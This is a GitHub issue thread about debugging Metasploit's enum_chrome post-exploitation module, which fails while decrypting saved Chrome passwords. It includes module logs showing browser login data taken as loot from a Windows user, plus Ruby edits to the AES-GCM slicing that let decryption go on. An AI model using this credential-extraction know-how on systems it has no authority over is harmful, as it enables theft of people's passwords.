Open Murph000 opened 2 months ago
Can you modify your /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb
file and change it from:
cipher.iv = enc_data[3..14]
ciphertext = enc_data[15..-17]
cipher.auth_tag = enc_data[-16..]
To:
print_status("enc_data: #{enc_data}")
cipher.iv = enc_data[3..14]
ciphertext = enc_data[15..-17]
cipher.auth_tag = enc_data[-16..]
To get the content of enc_data?
To my uneducated eye I see no difference
[+] Downloaded Web Data to '/root/.msf4/loot/20240408205508_default_71.226.250.46_chrome.raw.WebD_541215.txt'
[-] Cookies not found
[+] Downloaded History to '/root/.msf4/loot/20240408205509_default_71.226.250.46_chrome.raw.Histo_242454.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20240408205517_default_71.226.250.46_chrome.raw.Login_819038.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20240408205518_default_71.226.250.46_chrome.raw.Bookm_175064.txt'
[+] Downloaded Preferences to '/root/.msf4/loot/20240408205519_default_71.226.250.46_chrome.raw.Prefe_963829.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[-] Post failed: ArgumentError data must not be empty
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:207:in `update'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:207:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:378:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:375:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:375:in `run'
[*] Post module execution completed
Nothing got printed, did you reload_all or restart msfconsole?
Apologies, forgot to, here is the new output:
[*] Impersonating token: 16308
[*] Running as user 'DESKTOP-7IHT9N8\Rick'...
[*] Extracting data for user 'Rick'...
[+] Downloaded Web Data to '/root/.msf4/loot/20240409190801_default_73.33.253.190_chrome.raw.WebD_912879.txt'
[-] Cookies not found
[+] Downloaded History to '/root/.msf4/loot/20240409190802_default_73.33.253.190_chrome.raw.Histo_393266.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20240409190809_default_73.33.253.190_chrome.raw.Login_412976.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20240409190810_default_73.33.253.190_chrome.raw.Bookm_315029.txt'
[+] Downloaded Preferences to '/root/.msf4/loot/20240409190810_default_73.33.253.190_chrome.raw.Prefe_486057.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[*] "enc_data: #{enc_data}"
[-] Post failed: ArgumentError data must not be empty
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `update'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:379:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `run'
[*] Post module execution completed
Something with your copy-pasting went wrong, it should have printed this:
enc_data: [...data...]
And not:
"enc_data: #{enc_data}"
I seem to have pasted the wrong code, try this:
print_status("enc_data: #{enc_data}")
Thank you, apologies for the delay, here is the new output:
[+] Downloaded Web Data to '/root/.msf4/loot/20240411170353_default_71.226.250.46_chrome.raw.WebD_226980.txt'
[-] Cookies not found
[+] Downloaded History to '/root/.msf4/loot/20240411170354_default_71.226.250.46_chrome.raw.Histo_787563.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20240411170402_default_71.226.250.46_chrome.raw.Login_779870.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20240411170404_default_71.226.250.46_chrome.raw.Bookm_364976.txt'
[+] Downloaded Preferences to '/root/.msf4/loot/20240411170404_default_71.226.250.46_chrome.raw.Prefe_082933.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[*] enc_data: v10???X????W?j???[?N~?e?????Z???E?_
[*] enc_data: v10?*???V?\????c??u^9?7?S?W+N??Nz▒D?
[*] enc_data: v10BLy?Vw?>e0h????h????
%?C?8?z
[*] enc_data: v10??g
?^??Q?~?@?8@??k1?0r?e?7C?X?f
[*] enc_data: v10?Q??g?;?w?f???5?2?c5AK?f9\m??f11?x
[*] enc_data: v10????}??c?\?????????d'pqc
?
[*] enc_data: v10nD??}<??z?T??+2??8?}?5?oS???As??
[*] enc_data: v10????[?z????R?▒??????`Lc;?f????
[*] enc_data: v10 ▒?????????W?yo?.?,?U?5>@\^[{??8
[*] enc_data: v10????G:?Y??q??<?jP&
Ia?%~E:E??
[*] enc_data: v10V?F*?@?????z?o8???J??Em??????
_E?"?LMp???[: v10b?d?_?'7?)??B ?? ?
[*] enc_data: v10???8**~I???=%?lP?f?m?
[-] Post failed: ArgumentError data must not be empty
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `update'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:379:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `run'
[*] Post module execution completed
It seems like your enc_data is too short?!
Can you change it to this:
print_status("enc_data len: #{enc_data.length()}")
It returned the length as 31:
[*] Impersonating token: 12460
[*] Running as user 'DESKTOP-7IHT9N8\Rick'...
[*] Extracting data for user 'Rick'...
[+] Downloaded Web Data to '/root/.msf4/loot/20240413172341_default_10.0.0.94_chrome.raw.WebD_404667.txt'
[-] Cookies not found
[+] Downloaded History to '/root/.msf4/loot/20240413172342_default_10.0.0.94_chrome.raw.Histo_683194.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20240413172348_default_10.0.0.94_chrome.raw.Login_678351.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20240413172349_default_10.0.0.94_chrome.raw.Bookm_560730.txt'
[+] Downloaded Preferences to '/root/.msf4/loot/20240413172350_default_10.0.0.94_chrome.raw.Prefe_189370.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[*] enc_data len: 31
[-] Post failed: ArgumentError data must not be empty
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `update'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:379:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `run'
[*] Post module execution completed
Yes, 31 is not a "good" number - as the expected minimum value should be at least (X-17-15) where X is 32, as this code:
ciphertext = enc_data[15..-17]
Can be empty, but not nil, such as in the case of 31, where the value becomes "negative", enc_data[15..14]
I am wondering if: https://github.com/agentzex/chrome_v80_password_grabber/blob/master/chrome_v80_password_grabber.py
also fails in the same spot, as the logic seems similar, though written in a bit of a different way: decrypting and then removing the trailing bytes.
Can you change:
ciphertext = enc_data[15..-17]
To this:
ciphertext = enc_data[15..]
And see what it prints out?
If it prints out a valid password (with some residual characters at the end) then it would seem there is an option to store passwords in a length that is smaller than 32 bytes
It seems that changing ciphertext = enc_data[15..-17] to ciphertext = enc_data[15..] is causing a cipher error.
I had it print the length and the enc data, here is the new output:
[*] Found password encrypted with masterkey
[+] Found masterkey!
[*] enc_data: v10???X????W?j???[?N~?e?????Z???E?_
[*] enc_data len: 46
[-] Post failed: OpenSSL::Cipher::CipherError
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:209:in `final'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:209:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:380:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:377:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:377:in `run'
[*] Post module execution completed
I don't know what this malformed line (the one that has only 31 bytes in it) means, you can skip it if you wish by doing this:
item[:encrypted_fields].each do |field|
name = res['name_on_card'].nil? ? res['username_value'] : res['name_on_card']
origin = res['label'].nil? ? res['origin_url'] : res['label']
enc_data = res[field]
if enc_data.length < 32
next
end
Hi, I am just about clueless when it comes to ruby, but here is where I used the code you have just provided (lines 204-211), this is what the section of the script looks like:
cipher = OpenSSL::Cipher.new('aes-256-gcm')
cipher.decrypt
cipher.key = masterkey
item[:encrypted_fields].each do |field|
name = res['name_on_card'].nil? ? res['username_value'] : res['name_on_card']
origin = res['label'].nil? ? res['origin_url'] : res['label']
enc_data = res[field]
if enc_data.length < 32
next
end
cipher.iv = enc_data[3..14]
ciphertext = enc_data[15..-17]
cipher.auth_tag = enc_data[-16..]
I assume I'm just improperly using your code, here is what was in the log file:
[04/15/2024 18:56:25] [e(0)] core: /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb failed to load - SyntaxError /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:216: else without rescue is useless
else
^~~~
/usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:395: syntax error, unexpected end-of-input, expecting `end'
No need for the else part. If the if isn't triggered, the code should flow as it was before, so drop the else part:
if enc_data.length < 32
next
end
cipher.iv = enc_data[3..14]
ciphertext = enc_data[15..-17]
cipher.auth_tag = enc_data[-16..]
I don't know if it will prevent the syntax error you are seeing, as there is no rspec (unit test) file for this one
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Steps to reproduce
How'd you do it?
Expected behavior
Standard decryption and exporting of password data
Current behavior
Calls error
Metasploit version
Framework: 6.4.1-dev Console : 6.4.1-dev
Console output: